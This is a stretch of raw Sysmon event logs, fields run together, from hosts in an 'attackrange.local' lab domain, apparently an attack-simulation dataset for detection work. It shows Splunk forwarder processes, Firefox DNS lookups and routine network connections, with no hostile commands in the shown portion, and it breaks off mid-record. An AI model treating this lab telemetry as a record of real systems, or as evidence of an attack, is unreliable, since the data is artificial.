09:16:53.998{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051281Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.998{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8C05-6151-587A-00000000FC01}3868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051280Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.997{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8C05-6151-587A-00000000FC01}3868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051279Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.982{5EBD8912-8C05-6151-587A-00000000FC01}3868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979868Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:55.599{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F69C56CB3C075692537E6ADB2C395DDC,SHA256=40B606283CA4D59D0A0934E99D18445EFF0FBABC268C68060843DDDDF52DC1AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051385Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.930{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8C07-6151-5C7A-00000000FC01}5424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051384Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.928{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051383Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.928{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051382Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.928{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051381Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.928{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051380Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.928{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8C07-6151-5C7A-00000000FC01}5424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051379Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.927{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8C07-6151-5C7A-00000000FC01}5424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051378Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.910{5EBD8912-8C07-6151-5C7A-00000000FC01}5424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000001051377Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.310{5EBD8912-7B3A-6151-3A78-00000000FC01}7120media.ethicalads.io02606:4700:3034::6815:3e43;2606:4700:3033::ac43:dd0d;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001051376Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.307{5EBD8912-7B3A-6151-3A78-00000000FC01}7120readthedocs.org02606:4700:3035::6815:16e9;2606:4700:3033::ac43:cf94;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001051375Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.302{5EBD8912-7B3A-6151-3A78-00000000FC01}7120media.ethicalads.io0104.21.62.67;172.67.221.13;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001051374Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.302{5EBD8912-7B3A-6151-3A78-00000000FC01}7120readthedocs.org0172.67.207.148;104.21.22.233;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001051373Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.300{5EBD8912-7B3A-6151-3A78-00000000FC01}7120media.ethicalads.io0::ffff:172.67.221.13;::ffff:104.21.62.67;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001051372Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.297{5EBD8912-7B3A-6151-3A78-00000000FC01}7120readthedocs.org0::ffff:104.21.22.233;::ffff:172.67.207.148;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001051371Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.251{5EBD8912-7B3A-6151-3A78-00000000FC01}7120www-googletagmanager.l.google.com02a00:1450:4001:812::2008;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001051370Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:54.247{5EBD8912-7B3A-6151-3A78-00000000FC01}7120www-googletagmanager.l.google.com0142.250.185.200;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000001051369Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.447{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+c04bf0|C:\Program Files\Mozilla Firefox\xul.dll+c0456d|C:\Program Files\Mozilla Firefox\xul.dll+bfd604|C:\Program Files\Mozilla Firefox\xul.dll+27ac2ad|C:\Program Files\Mozilla Firefox\xul.dll+c057d6|C:\Program Files\Mozilla Firefox\xul.dll+bfe95b|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+c00578|C:\Program Files\Mozilla Firefox\xul.dll+27ad51e|C:\Program Files\Mozilla Firefox\xul.dll+27ad2b4|C:\Program Files\Mozilla Firefox\xul.dll+c06a32|C:\Program Files\Mozilla Firefox\xul.dll+c007d9 10341000x80000000000000001051368Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.417{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b5c4e8|C:\Program Files\Mozilla Firefox\xul.dll+19a2e8e|C:\Program Files\Mozilla Firefox\xul.dll+166f362|C:\Program Files\Mozilla Firefox\xul.dll+19ccb3c|C:\Program Files\Mozilla Firefox\xul.dll+9ebb5f|C:\Program Files\Mozilla Firefox\xul.dll+26b8e|C:\Program Files\Mozilla Firefox\xul.dll+19d5d8|C:\Program Files\Mozilla Firefox\xul.dll+19c48f|C:\Program Files\Mozilla Firefox\xul.dll+42102ba|C:\Program Files\Mozilla Firefox\xul.dll+427c355|C:\Program Files\Mozilla Firefox\xul.dll+427d173|C:\Program Files\Mozilla Firefox\xul.dll+1ef1143|C:\Program Files\Mozilla Firefox\firefox.exe+5c4d|C:\Program Files\Mozilla Firefox\firefox.exe+1bb98|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051367Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.414{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+c0467b|C:\Program Files\Mozilla Firefox\xul.dll+bfd432|C:\Program Files\Mozilla Firefox\xul.dll+27ac2ad|C:\Program Files\Mozilla Firefox\xul.dll+c057d6|C:\Program Files\Mozilla Firefox\xul.dll+bfe95b|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+c00578|C:\Program Files\Mozilla Firefox\xul.dll+27ad51e|C:\Program Files\Mozilla Firefox\xul.dll+27ad2b4|C:\Program Files\Mozilla Firefox\xul.dll+c06a32|C:\Program Files\Mozilla Firefox\xul.dll+c007d9|C:\Program Files\Mozilla Firefox\xul.dll+39647b 354300x80000000000000001051366Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.992{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local55817- 354300x80000000000000001051365Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.987{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local52642- 354300x80000000000000001051364Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.986{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local58553- 354300x80000000000000001051363Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.971{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-429.attackrange.local49290-false142.250.185.200fra16s52-in-f8.1e100.net443https 354300x80000000000000001051362Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.939{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local53447-false142.250.185.200fra16s52-in-f8.1e100.net443https 354300x80000000000000001051361Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.938{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49289- 354300x80000000000000001051360Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.937{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54134- 354300x80000000000000001051359Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.881{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-429.attackrange.local64462-false172.67.207.148-443https 354300x80000000000000001051358Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.845{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local53445-false172.67.207.148-443https 354300x80000000000000001051357Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.845{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local53446-false172.67.207.148-443https 354300x80000000000000001051356Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.844{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local53444-false172.67.207.148-443https 354300x80000000000000001051355Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:53.832{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53443-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001051354Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.248{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8C07-6151-5B7A-00000000FC01}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051353Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.246{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051352Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.246{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051351Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:55.246{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051350Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 